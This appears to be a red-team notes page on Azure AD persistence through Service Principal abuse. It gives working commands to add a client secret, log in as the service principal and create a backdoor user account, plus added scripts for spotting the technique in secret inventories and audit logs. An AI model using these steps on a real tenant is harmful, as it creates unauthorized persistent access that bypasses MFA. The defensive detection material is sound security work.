# Service Principal Abuse

This persistence method backdoors an Azure application: by abusing a Service Principal (SP) account we gain SSO-style access to the environment with that application's permissions, without needing any user credentials.

The main benefit of targeting SP accounts is that MFA can't be enforced on their logins, and one is created by default along with **any** application. The only downside is the possible presence of a Conditional Access Policy that enforces other conditions on the login process, but even that still can't require MFA for a Service Principal account.

Once we have created an application (or taken control of an existing one) we add a Client Secret with a generous expiration period; this secret is the password we'll use to log into the application. As we already did in [Abusing Cloud Administrator Role](https://otter.gitbook.io/red-teaming/notes/aad/abusing-cloud-administrator-role), we can now log into the application as a Service Principal:

```powershell
PS /home/otter> az login --service-principal -u <application_id> -p <client_secret> --tenant <tenant_id>
```

Another way to log into the SP account is to request a Graph access token with the OAuth2 client-credentials grant and hand it to the Graph PowerShell SDK:

```powershell
PS /home/otter> $AppId = "<app_id>"
PS /home/otter> $TenantId = "<tenant_id>"
PS /home/otter> $ClientSecret = "<client_secret>"
PS /home/otter> $body = @{
>> grant_type = "client_credentials"
>> scope = "https://graph.microsoft.com/.default"
>> client_id = $AppId
>> client_secret = $ClientSecret
>> }
PS /home/otter> $connection = Invoke-RestMethod `
>> -Uri "https://login.microsoftonline.com/$TenantId/oauth2/v2.0/token" `
>> -Method POST `
>> -Body $body
PS /home/otter> $token = $connection.access_token
# Microsoft.Graph SDK 1.x accepts the raw string token; SDK 2.x requires a SecureString
PS /home/otter> Connect-MgGraph -AccessToken ($token | ConvertTo-SecureString -AsPlainText -Force)
```

Since the SP account has the same permissions as its application, we need to pick an application with "interesting" permissions over the tenant. Ideally we'd create a new user account as a persistence mechanism; that requires the permissions behind `New-MgUser`, so we use the following commands to list the permissions needed for that action and the scopes our current session already has:

```powershell
# permissions required by the cmdlet we want to run
PS /home/otter> (Find-MgGraphCommand -Command New-MgUser).Permissions
# scopes our current session actually has
PS /home/otter> Get-MgContext | Select-Object -ExpandProperty Scopes
```
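From the defending side, the two things this technique relies on (a long-lived client secret on an application whose service principal holds write permissions) are easy to inventory. The script below is an added example, not part of the original notes: it assumes the Microsoft.Graph PowerShell SDK with a session holding the `Application.Read.All` and `Directory.Read.All` scopes, resolves granted app-role GUIDs to names through the Microsoft Graph service principal's `AppRoles` list so no permission GUIDs are hardcoded, and the 180-day threshold is an arbitrary choice.

```powershell
# Added defender-side check (not from the original notes): list every application's
# client secrets with their remaining lifetime and the Microsoft Graph application
# permissions granted to its service principal. Long-lived secrets on apps with
# write permissions are the combination the technique above depends on.
# Assumes Connect-MgGraph has been run with Application.Read.All and Directory.Read.All.

$MaxSecretLifetimeDays = 180   # flag secrets valid longer than this (arbitrary threshold)

# Well-known application ID of the Microsoft Graph resource service principal
$GraphAppId = "00000003-0000-0000-c000-000000000000"
$graphSp    = Get-MgServicePrincipal -Filter "appId eq '$GraphAppId'"

# Map app-role GUID -> permission name (e.g. User.ReadWrite.All)
$roleNames = @{}
foreach ($role in $graphSp.AppRoles) { $roleNames[$role.Id] = $role.Value }

$now = Get-Date
$findings = foreach ($app in Get-MgApplication -All) {
    $sp = Get-MgServicePrincipal -Filter "appId eq '$($app.AppId)'"
    if (-not $sp) { continue }

    # Application permissions actually granted (admin-consented) to this SP on Graph
    $granted = Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $sp.Id |
        Where-Object { $_.ResourceId -eq $graphSp.Id } |
        ForEach-Object { $roleNames[$_.AppRoleId] }

    foreach ($secret in $app.PasswordCredentials) {
        if (-not $secret.EndDateTime) { continue }
        $daysLeft = [int]($secret.EndDateTime - $now).TotalDays
        [pscustomobject]@{
            Application = $app.DisplayName
            AppId       = $app.AppId
            SecretName  = $secret.DisplayName
            SecretAdded = $secret.StartDateTime
            DaysLeft    = $daysLeft
            LongLived   = $daysLeft -gt $MaxSecretLifetimeDays
            # only the permissions that allow changes in the tenant
            WritePerms  = ($granted | Where-Object { $_ -match 'Write' }) -join ', '
        }
    }
}

# Long-lived secrets on apps that can write to the directory go to the top of the list
$findings | Sort-Object -Property LongLived, DaysLeft -Descending |
    Format-Table Application, SecretName, SecretAdded, DaysLeft, LongLived, WritePerms -AutoSize
```

A secret whose `SecretAdded` date does not match any change request, sitting on an app with `User.ReadWrite.All` or `Directory.ReadWrite.All` in `WritePerms`, is the case worth investigating first.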

If the application already has these permissions, or we can assign them to the app ourselves, we are able to create a new user account:

```powershell
# New-MgUser needs a password profile hashtable; -AccountEnabled (there is no -AccountDisabled switch) so we can log in as the user afterwards
PS /home/otter> $PasswordProfile = @{ Password = "<password>" }
PS /home/otter> New-MgUser -DisplayName "Otter Sec" -PasswordProfile $PasswordProfile -AccountEnabled -MailNickName "otter" -UserPrincipalName "ottersec@minions.onmicrosoft.com"
```

The final step is to log in as this user and change their password.
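In the audit log the same chain appears from the defender's view: a credential added to an application or its service principal, followed later by a user created by that application rather than by a person. The script below is an added example (not from the original notes) that correlates those two events over a constructed sample of audit records; the field names follow the Graph `directoryAudit` schema (`activityDisplayName`, `category`, `initiatedBy`, `targetResources`), and the sample entries, names and timestamps are made up.

```powershell
# Added detection example (not from the original notes): scan an Azure AD audit-log
# export for a credential being added to an app, followed by that app (not a user)
# creating a user account. The JSON below is constructed sample data shaped like
# Graph directoryAudit records; the portal writes a dash in the activity name
# "Update application - Certificates and secrets management", hence the wildcard match.
$sampleAuditLog = @'
[
  { "activityDateTime": "2024-03-01T08:02:11Z", "category": "ApplicationManagement",
    "activityDisplayName": "Update application - Certificates and secrets management",
    "initiatedBy": { "user": { "userPrincipalName": "admin@minions.onmicrosoft.com" }, "app": null },
    "targetResources": [ { "displayName": "Payroll Sync", "type": "Application" } ] },
  { "activityDateTime": "2024-03-01T08:02:12Z", "category": "ApplicationManagement",
    "activityDisplayName": "Add service principal credentials",
    "initiatedBy": { "user": { "userPrincipalName": "admin@minions.onmicrosoft.com" }, "app": null },
    "targetResources": [ { "displayName": "Payroll Sync", "type": "ServicePrincipal" } ] },
  { "activityDateTime": "2024-03-01T23:41:05Z", "category": "UserManagement",
    "activityDisplayName": "Add user",
    "initiatedBy": { "user": null, "app": { "displayName": "Payroll Sync" } },
    "targetResources": [ { "displayName": "Otter Sec", "userPrincipalName": "ottersec@minions.onmicrosoft.com", "type": "User" } ] },
  { "activityDateTime": "2024-03-02T09:15:00Z", "category": "UserManagement",
    "activityDisplayName": "Add user",
    "initiatedBy": { "user": { "userPrincipalName": "hr@minions.onmicrosoft.com" }, "app": null },
    "targetResources": [ { "displayName": "New Hire", "userPrincipalName": "newhire@minions.onmicrosoft.com", "type": "User" } ] }
]
'@

$events = $sampleAuditLog | ConvertFrom-Json

# Step 1: which apps received a new password/certificate, when, and by whom
$credAdds = $events |
    Where-Object { ($_.activityDisplayName -eq 'Add service principal credentials') -or
                   ($_.activityDisplayName -like 'Update application*Certificates and secrets*') } |
    ForEach-Object {
        [pscustomobject]@{
            App  = $_.targetResources[0].displayName
            When = [datetime]$_.activityDateTime
            By   = $_.initiatedBy.user.userPrincipalName
        }
    }

# Step 2: user creations performed by an application identity rather than a person
$appCreatedUsers = $events |
    Where-Object { $_.activityDisplayName -eq 'Add user' -and $null -ne $_.initiatedBy.app }

# Step 3: correlate; flag users created by an app that got a new credential beforehand
$alerts = foreach ($u in $appCreatedUsers) {
    $app  = $u.initiatedBy.app.displayName
    $when = [datetime]$u.activityDateTime
    $first = $credAdds | Where-Object { $_.App -eq $app -and $_.When -lt $when } |
        Sort-Object When | Select-Object -First 1
    if ($first) {
        [pscustomobject]@{
            Severity        = 'High'
            Application     = $app
            CredentialAdded = $first.When
            CredentialBy    = $first.By
            UserCreated     = $u.targetResources[0].userPrincipalName
            CreatedAt       = $when
        }
    }
}

$alerts | Format-List
```

On the sample data this yields one alert for `Payroll Sync` creating `ottersec@minions.onmicrosoft.com`, while the user created by `hr@minions.onmicrosoft.com` is ignored. Against a live tenant, `$events` can be fed from `Get-MgAuditLogDirectoryAudit` (Microsoft.Graph.Reports) instead of the embedded JSON, and the service-principal sign-in logs show the SP logins that sit between the two events.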

